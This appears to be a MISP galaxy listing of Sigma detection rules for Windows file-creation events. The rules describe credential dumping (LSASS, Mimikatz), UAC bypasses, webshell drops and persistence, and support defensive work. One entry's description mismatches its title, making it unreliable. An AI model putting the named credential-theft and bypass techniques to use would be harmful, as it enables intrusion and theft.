falsepositive ['Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise']
filename file_event_win_bloodhound_collection.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Creation of an WerFault.exe in Unusual Folder

Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking

Internal MISP references

UUID 28a452f3-786c-4fd8-b8f2-bddbe9d616d1 which can be used as unique global reference for Creation of an WerFault.exe in Unusual Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/09
falsepositive ['Unknown']
filename file_event_win_werfault_dll_hijacking.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Octopus Scanner Malware

Detects Octopus Scanner Malware.

Internal MISP references

UUID 805c55d9-31e6-4846-9878-c34c75054fe9 which can be used as unique global reference for Octopus Scanner Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/06/09
falsepositive ['Unknown']
filename file_event_win_mal_octopus_scanner.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1195', 'attack.t1195.001']
Related clusters

To see the related clusters, click here.

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

Internal MISP references

UUID 409f8a98-4496-4aaa-818a-c931c0a8b832 which can be used as unique global reference for Created Files by Microsoft Sync Center in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename file_event_win_susp_creation_by_mobsync.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Suspicious Binary Writes Via AnyDesk

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

Internal MISP references

UUID 2d367498-5112-4ae5-a06a-96e7bc33a211 which can be used as unique global reference for Suspicious Binary Writes Via AnyDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/28
falsepositive ['Unknown']
filename file_event_win_anydesk_writing_susp_binaries.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Potential RipZip Attack on Startup Folder

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.

Internal MISP references

UUID a6976974-ea6f-4e97-818e-ea08625c52cb which can be used as unique global reference for Potential RipZip Attack on Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Greg (rule)
creation_date 2022/07/21
falsepositive ['Unknown']
filename file_event_win_ripzip_attack.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"

Internal MISP references

UUID a8f866e1-bdd4-425e-a27a-37619238d9c7 which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Scoubi (@ScoubiMtl)
creation_date 2023/10/09
falsepositive ['Unlikely']
filename file_event_win_susp_hidden_dir_index_allocation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Advanced IP Scanner - File Event

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Internal MISP references

UUID fed85bf9-e075-4280-9159-fbe8a023d6fa which can be used as unique global reference for Advanced IP Scanner - File Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020/05/12
falsepositive ['Legitimate administrative use']
filename file_event_win_advanced_ip_scanner.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Windows Media Player - File

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 68578b43-65df-4f81-9a9b-92f32711a951 which can be used as unique global reference for UAC Bypass Using Windows Media Player - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_wmp.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive powershell scripts used for exploitation

Internal MISP references

UUID f331aa1f-8c53-4fc3-b083-cc159bc971cb which can be used as unique global reference for Malicious PowerShell Scripts - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
creation_date 2018/04/07
falsepositive ['Unknown']
filename file_event_win_powershell_exploit_scripts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS

Internal MISP references

UUID 6b269392-9eba-40b5-acb6-55c882b20ba6 which can be used as unique global reference for Suspicious File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/04
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop_suspicious.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1190', 'attack.initial_access', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Potential Binary Or Script Dropper Via PowerShell

Detects PowerShell creating a binary executable or a script file.

Internal MISP references

UUID 7047d730-036f-4f40-b9d8-1c63e36d5e62 which can be used as unique global reference for Potential Binary Or Script Dropper Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/17
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_binary_or_script.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

CSExec Service File Creation

Detects default CSExec service filename which indicates CSExec service installation and execution

Internal MISP references

UUID f0e2b768-5220-47dd-b891-d57b96fc0ec1 which can be used as unique global reference for CSExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/04
falsepositive ['Unknown']
filename file_event_win_csexec_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious MSExchangeMailboxReplication ASPX Write

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation

Internal MISP references

UUID 7280c9f3-a5af-45d0-916a-bc01cb4151c9 which can be used as unique global reference for Suspicious MSExchangeMailboxReplication ASPX Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename file_event_win_susp_exchange_aspx_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Suspicious File Created In PerfLogs

Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

Internal MISP references

UUID bbb7e38c-0b41-4a11-b306-d2a457b7ac2b which can be used as unique global reference for Suspicious File Created In PerfLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unlikely']
filename file_event_win_perflogs_susp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

PCRE.NET Package Temp Files

Detects processes creating temp files related to PCRE.NET package

Internal MISP references

UUID 6e90ae7a-7cd3-473f-a035-4ebb72d961da which can be used as unique global reference for PCRE.NET Package Temp Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/29
falsepositive ['Unknown']
filename file_event_win_pcre_net_temp_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Files With System Process Name In Unsuspected Locations

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Internal MISP references

UUID d5866ddf-ce8f-4aea-b28e-d96485a20d3d which can be used as unique global reference for Files With System Process Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/26
falsepositive ['System processes copied outside their default folders for testing purposes', 'Third party software naming their software with the same names as the processes mentioned here']
filename file_event_win_creation_system_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Cred Dump Tools Dropped Files

Files with well-known filenames (parts of credential dump software or files produced by them) creation

Internal MISP references

UUID 8fbf3271-1ef6-4e94-8210-03c2317947f6 which can be used as unique global reference for Cred Dump Tools Dropped Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/11/01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename file_event_win_cred_dump_tools_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.003', 'attack.t1003.004', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

PowerShell Profile Modification

Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

Internal MISP references

UUID b5b78988-486d-4a80-b991-930eff3ff8bf which can be used as unique global reference for PowerShell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author HieuTT35, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/24
falsepositive ['System administrator creating Powershell profile manually']
filename file_event_win_susp_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Installation of TeamViewer Desktop

TeamViewer_Desktop.exe is create during install

Internal MISP references

UUID 9711de76-5d4f-4c50-a94f-21e4e8f8384d which can be used as unique global reference for Installation of TeamViewer Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename file_event_win_install_teamviewer_desktop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

UAC Bypass Using .NET Code Profiler on MMC

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

Internal MISP references

UUID 93a19907-d4f9-4deb-9f91-aac4692776a6 which can be used as unique global reference for UAC Bypass Using .NET Code Profiler on MMC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_dotnet_profiler.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Office Startup Folder

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

Internal MISP references

UUID 0e20c89d-2264-44ae-8238-aeeaba609ece which can be used as unique global reference for Potential Persistence Via Microsoft Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Loading a user environment from a backup or a domain controller', 'Synchronization of templates']
filename file_event_win_office_startup_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

RDP File Creation From Suspicious Application

Detects Rclone config file being created

Internal MISP references

UUID fccfb43e-09a7-4bd2-8b37-a5a7df33386d which can be used as unique global reference for RDP File Creation From Suspicious Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unknown']
filename file_event_win_rdp_file_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

WMI Persistence - Script Event Consumer File Write

Detects file writes of WMI script event consumer

Internal MISP references

UUID 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4 which can be used as unique global reference for WMI Persistence - Script Event Consumer File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)']
filename file_event_win_wmi_persistence_script_event_consumer_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1546.003', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

Internal MISP references

UUID 2f7979ae-f82b-45af-ac1d-2b10e93b0baa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
creation_date 2020/10/12
falsepositive ['Unknown']
filename file_event_win_dcom_iertutil_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

Internal MISP references

UUID 81315b50-6b60-4d8f-9928-3466e1022515 which can be used as unique global reference for Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
creation_date 2020/03/19
falsepositive ['Operations performed through Windows SCCM or equivalent', 'Read only access list authority']
filename file_event_win_susp_desktop_ini.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Drop Binaries Into Spool Drivers Color Folder

Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below

Internal MISP references

UUID ce7066a6-508a-42d3-995b-2952c65dc2ce which can be used as unique global reference for Drop Binaries Into Spool Drivers Color Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename file_event_win_susp_spool_drivers_color_drop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Potential Winnti Dropper Activity

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

Internal MISP references

UUID 130c9e58-28ac-4f83-8574-0a4cc913b97e which can be used as unique global reference for Potential Winnti Dropper Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename file_event_win_redmimicry_winnti_filedrop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious PFX File Creation

A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.

Internal MISP references

UUID dca1b3e8-e043-4ec8-85d7-867f334b5724 which can be used as unique global reference for Suspicious PFX File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['System administrators managing certificates.']
filename file_event_win_susp_pfx_file_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

File Creation In Suspicious Directory By Msdt.EXE

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

Internal MISP references

UUID 318557a5-150c-4c8d-b70e-a9910e199857 which can be used as unique global reference for File Creation In Suspicious Directory By Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Varganov, Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename file_event_win_msdt_susp_directories.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001', 'cve.2022.30190']
Related clusters

To see the related clusters, click here.

Suspicious DotNET CLR Usage Log Artifact

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.

Internal MISP references

UUID e0b06658-7d1d-4cd3-bf15-03467507ff7c which can be used as unique global reference for Suspicious DotNET CLR Usage Log Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, omkar72, oscd.community, Wojciech Lesicki
creation_date 2022/11/18
falsepositive ['Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675']
filename file_event_win_net_cli_artefact.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

Internal MISP references

UUID bb09dd3e-2b78-4819-8e35-a7c1b874e449 which can be used as unique global reference for Inveigh Execution Artefacts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Unlikely']
filename file_event_win_hktl_inveigh_artefacts.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

UAC Bypass Using EventVwr

Detects the pattern of a UAC bypass using Windows Event Viewer

Internal MISP references

UUID 63e4f530-65dc-49cc-8f80-ccfa95c69d43 which can be used as unique global reference for UAC Bypass Using EventVwr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
creation_date 2022/04/27
falsepositive ['Unknown']
filename file_event_win_uac_bypass_eventvwr.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Suspicious ASPX File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder

Internal MISP references

UUID bd1212e5-78da-431e-95fa-c58e3237a8e6 which can be used as unique global reference for Suspicious ASPX File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query, idea)
creation_date 2022/10/01
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Adwind RAT / JRAT File Artifact

Detects javaw.exe in AppData folder as used by Adwind / JRAT

Internal MISP references

UUID 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 which can be used as unique global reference for Adwind RAT / JRAT File Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
creation_date 2017/11/10
falsepositive No established falsepositives
filename file_event_win_mal_adwind.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

Internal MISP references

UUID 93d94efc-d7ad-4161-ad7d-1638c4f908d8 which can be used as unique global reference for HackTool - Dumpert Process Dumper Default File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/02/04
falsepositive ['Very unlikely']
filename file_event_win_hktl_dumpert.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

LSASS Process Dump Artefact In CrashDumps Folder

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

Internal MISP references

UUID 6902955a-01b7-432c-b32a-6f5f81d8f625 which can be used as unique global reference for LSASS Process Dump Artefact In CrashDumps Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022/12/08
falsepositive ['Rare legitimate dump of the process by the operating system due to a crash of lsass']
filename file_event_win_lsass_shtinkering.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Anydesk Temporary Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 0b9ad457-2554-44c1-82c2-d56a99c42377 which can be used as unique global reference for Anydesk Temporary Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename file_event_win_anydesk_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Process Monitor Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

Internal MISP references

UUID a05baa88-e922-4001-bc4d-8738135f27de which can be used as unique global reference for Process Monitor Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Some false positives may occur with legitimate renamed process monitor binaries']
filename file_event_win_sysinternals_procmon_driver_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Mimikatz Kirbi File Creation

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

Internal MISP references

UUID 9e099d99-44c2-42b6-a6d8-54c3545cab29 which can be used as unique global reference for Mimikatz Kirbi File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE
creation_date 2021/11/08
falsepositive ['Unlikely']
filename file_event_win_hktl_mimikatz_files.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1558']
Related clusters

To see the related clusters, click here.

PSScriptPolicyTest Creation By Uncommon Process

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.

Internal MISP references

UUID 1027d292-dd87-4a1a-8701-2abe04d7783c which can be used as unique global reference for PSScriptPolicyTest Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

Internal MISP references

UUID 8d5aca11-22b3-4f22-b7ba-90e60533e1fb which can be used as unique global reference for Wmiexec Default Output File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Unlikely']
filename file_event_win_wmiexec_default_filename.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1047']
Related clusters

To see the related clusters, click here.

RemCom Service File Creation

Detects default RemCom service filename which indicates RemCom service installation and execution

Internal MISP references

UUID 7eff1a7f-dd45-4c20-877a-f21e342a7611 which can be used as unique global reference for RemCom Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/04
falsepositive ['Unknown']
filename file_event_win_remcom_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

New Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 which can be used as unique global reference for New Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021/04/05
falsepositive ['User genuinely creates a VB Macro for their email']
filename file_event_win_office_outlook_macro_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Suspicious Screensaver Binary File Creation

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension

Internal MISP references

UUID 97aa2e88-555c-450d-85a6-229bcd87efb8 which can be used as unique global reference for Suspicious Screensaver Binary File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/29
falsepositive ['Unknown']
filename file_event_win_creation_scr_binary_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

Potential Startup Shortcut Persistence Via PowerShell.EXE

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"

Internal MISP references

UUID 92fa78e7-4d39-45f1-91a3-8b23f3f1088d which can be used as unique global reference for Potential Startup Shortcut Persistence Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE
creation_date 2021/10/24
falsepositive ['Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.']
filename file_event_win_powershell_startup_shortcuts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Office Macro File Creation From Suspicious Process

Detects the creation of a office macro file from a a suspicious process

Internal MISP references

UUID b1c50487-1967-4315-a026-6491686d860e which can be used as unique global reference for Office Macro File Creation From Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Unknown']
filename file_event_win_office_macro_files_from_susp_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Dynamic CSharp Compile Artefact

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

Internal MISP references

UUID e4a74e34-ecde-4aab-b2fb-9112dd01aed0 which can be used as unique global reference for Dynamic CSharp Compile Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename file_event_win_csharp_compile_artefact.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

Startup Folder File Write

A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.

Internal MISP references

UUID 2aa0a6b4-a865-495b-ab51-c28249537b75 which can be used as unique global reference for Startup Folder File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
